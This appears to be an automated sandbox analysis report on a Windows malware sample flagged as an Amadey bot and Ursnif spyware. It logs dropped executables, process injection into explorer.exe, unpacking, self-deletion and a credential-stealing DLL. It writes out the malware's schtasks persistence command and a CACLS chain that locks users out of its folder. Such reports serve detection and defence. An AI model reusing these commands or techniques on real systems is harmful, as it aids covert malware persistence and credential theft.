Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_0040145D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_00401469 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_0040148C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,

Source: 86EE.exe.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 8C00.exe.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 2B4A.exe.1.dr	Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: 453D.exe.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: S2XJ2wbz7u.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\tiddsjj

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@67/30@58/22

Source: C:\Users\user\AppData\Local\Temp\3790.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe

Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\S2XJ2wbz7u.exe C:\Users\user\Desktop\S2XJ2wbz7u.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\tiddsjj C:\Users\user\AppData\Roaming\tiddsjj
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2B4A.exe C:\Users\user\AppData\Local\Temp\2B4A.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3790.exe C:\Users\user\AppData\Local\Temp\3790.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\453D.exe C:\Users\user\AppData\Local\Temp\453D.exe
Source: C:\Users\user\AppData\Local\Temp\3790.exe	Process created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\59FE.exe C:\Users\user\AppData\Local\Temp\59FE.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6644.exe C:\Users\user\AppData\Local\Temp\6644.exe
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6CEC.exe C:\Users\user\AppData\Local\Temp\6CEC.exe
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y\|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\816F.exe C:\Users\user\AppData\Local\Temp\816F.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\8C00.exe	Process created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2B4A.exe C:\Users\user\AppData\Local\Temp\2B4A.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3790.exe C:\Users\user\AppData\Local\Temp\3790.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\453D.exe C:\Users\user\AppData\Local\Temp\453D.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\59FE.exe C:\Users\user\AppData\Local\Temp\59FE.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6644.exe C:\Users\user\AppData\Local\Temp\6644.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6CEC.exe C:\Users\user\AppData\Local\Temp\6CEC.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\816F.exe C:\Users\user\AppData\Local\Temp\816F.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\3790.exe	Process created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y\|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Users\user\AppData\Local\Temp\8C00.exe	Process created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Users\user\AppData\Local\Temp\8C00.exe	Process created: unknown unknown

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\2B4A.tmp

Jump to behavior

Source: 86EE.exe, 0000002D.00000003.493869220.00000000273B2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.492502087.00000000273B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE offer_eligible_instrument ( offer_id UNSIGNED LONG,instrument_id UNSIGNED LONG),;' 4;'*
Source: 86EE.exe, 0000002D.00000003.490197880.00000000273B4000.00000004.00000800.00020000.00000000.sdmp, 95786452850497366982696300.45.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Roaming\tiddsjj

Code function: 11_2_00B48AD6 CreateToolhelp32Snapshot,Module32First,

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Mutant created: \Sessions\1\BaseNamedObjects\E3ECD25DF9
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_01

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe

Command line argument: 08A

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe

Source: 816F.exe.1.dr, RequireDashesIsolatedStoragePermissionAttribute/GetRemoveMethodSetRange.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 816F.exe.1.dr, RequireDashesIsolatedStoragePermissionAttribute/GetRemoveMethodSetRange.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 26.0.816F.exe.190000.0.unpack, RequireDashesIsolatedStoragePermissionAttribute/GetRemoveMethodSetRange.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 26.0.816F.exe.190000.0.unpack, RequireDashesIsolatedStoragePermissionAttribute/GetRemoveMethodSetRange.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Users\user\AppData\Local\Temp\86EE.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: S2XJ2wbz7u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: S2XJ2wbz7u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: S2XJ2wbz7u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: S2XJ2wbz7u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: S2XJ2wbz7u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: S2XJ2wbz7u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: S2XJ2wbz7u.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\lulubob99\yu.pdb source: 3790.exe, 0000000D.00000000.396647319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, rovwer.exe, 0000000F.00000000.410516994.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000002.519144240.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000000.438994801.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 3790.exe.1.dr, rovwer.exe.13.dr
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 3790.exe, 0000000D.00000002.412472703.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, 3790.exe, 0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp, 3790.exe, 0000000D.00000003.404528480.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.520940016.0000000000400000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\cekezuca_v.pdb source: 6644.exe, 00000013.00000000.423486676.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, 6644.exe.1.dr
Source:	Binary string: /.pdb source: 2B4A.exe, 0000000C.00000002.517632493.0000000000197000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: ?C:\lulubob99\yu.pdbQ source: 3790.exe, 0000000D.00000000.396647319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, rovwer.exe, 0000000F.00000000.410516994.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000002.519144240.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000000.438994801.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 3790.exe.1.dr, rovwer.exe.13.dr
Source:	Binary string: _.pdb source: 2B4A.exe, 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\android.annotation.TestApi.module1 - Copy.pdb source: 816F.exe, 0000001A.00000000.437232628.0000000000192000.00000002.00000001.01000000.00000011.sdmp, 816F.exe.1.dr
Source:	Binary string: (P&gHC:\Windows\System.ServiceModel.pdb source: 2B4A.exe, 0000000C.00000002.517632493.0000000000197000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\tahaf\to.pdbQ source: S2XJ2wbz7u.exe, tiddsjj.1.dr
Source:	Binary string: C:\tahaf\to.pdb source: S2XJ2wbz7u.exe, tiddsjj.1.dr
Source:	Binary string: SC:\vum\nuzuyo.pdb source: 2B4A.exe, 0000000C.00000000.390215303.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 2B4A.exe.1.dr
Source:	Binary string: C:\vum\nuzuyo.pdb source: 2B4A.exe, 0000000C.00000000.390215303.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 2B4A.exe.1.dr
Source:	Binary string: @C:\cekezuca_v.pdb source: 6644.exe, 00000013.00000000.423486676.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, 6644.exe.1.dr

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Unpacked PE file: 12.2.2B4A.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\3790.exe	Unpacked PE file: 13.2.3790.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Unpacked PE file: 15.2.rovwer.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\6644.exe	Unpacked PE file: 19.2.6644.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Unpacked PE file: 0.2.S2XJ2wbz7u.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\tiddsjj	Unpacked PE file: 11.2.tiddsjj.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Unpacked PE file: 12.2.2B4A.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\3790.exe	Unpacked PE file: 13.2.3790.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Unpacked PE file: 15.2.rovwer.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\6644.exe	Unpacked PE file: 19.2.6644.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;

.NET source code contains potential unpacker

Source: 816F.exe.1.dr, RequireDashesIsolatedStoragePermissionAttribute/SpecialNameAttributeSByteArrayTypeInfo.cs	.Net Code: IIDIEnumSTOREDEPLOYMENTMETADATAPROPERTYsetNextActivator System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 26.0.816F.exe.190000.0.unpack, RequireDashesIsolatedStoragePermissionAttribute/SpecialNameAttributeSByteArrayTypeInfo.cs	.Net Code: IIDIEnumSTOREDEPLOYMENTMETADATAPROPERTYsetNextActivator System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Code function: 0_2_00401268 push cs; iretd
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Code function: 0_2_00402B84 push esp; iretd
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Code function: 0_2_0040CE34 pushad ; iretd
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Code function: 0_2_00412698 push ss; ret
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Code function: 0_2_0040CF10 push edi; iretd
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_00401268 push cs; iretd
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_00402B84 push esp; iretd
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_0040CE34 pushad ; iretd
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_00412698 push ss; ret
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_0040CF10 push edi; iretd
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_009312CF push cs; iretd
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_00931790 push 81396969h; iretd
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_00B4F02F push edi; ret
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_00B4EE1A push edx; retf
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_00B4BA58 push es; retf
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_0041C40C push cs; iretd
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_00407CE6 push 8B0041E4h; retf
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_0041C50E push cs; iretd
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_0040E21D push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_0041C6BE push ebx; ret

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe

Source: 59FE.exe.1.dr

Static PE information: section name: _RDATA

Source: 86EE.exe.1.dr	Static PE information: real checksum: 0xae41 should be: 0x5a5ca
Source: cred64[1].dll.15.dr	Static PE information: real checksum: 0x0 should be: 0x26b56
Source: 59FE.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x31822d
Source: cred64.dll.15.dr	Static PE information: real checksum: 0x0 should be: 0x26b56
Source: 8C00.exe.1.dr	Static PE information: real checksum: 0xae41 should be: 0x5a5ca

Source: initial sample

Static PE information: section name: .text entropy: 7.881559830047924

Persistence and Installation Behavior

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.542120947.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rovwer.exe PID: 4764, type: MEMORYSTR

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\tiddsjj

Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\59FE.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\86EE.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\453D.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3790.exe	File created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\6644.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\2B4A.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\argq[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\Roaming\PingboardCache\argq.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\816F.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\8C00.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\tiddsjj	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\6CEC.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\3790.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Yara detected Ursnif

Source: Yara match	File source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\s2xj2wbz7u.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

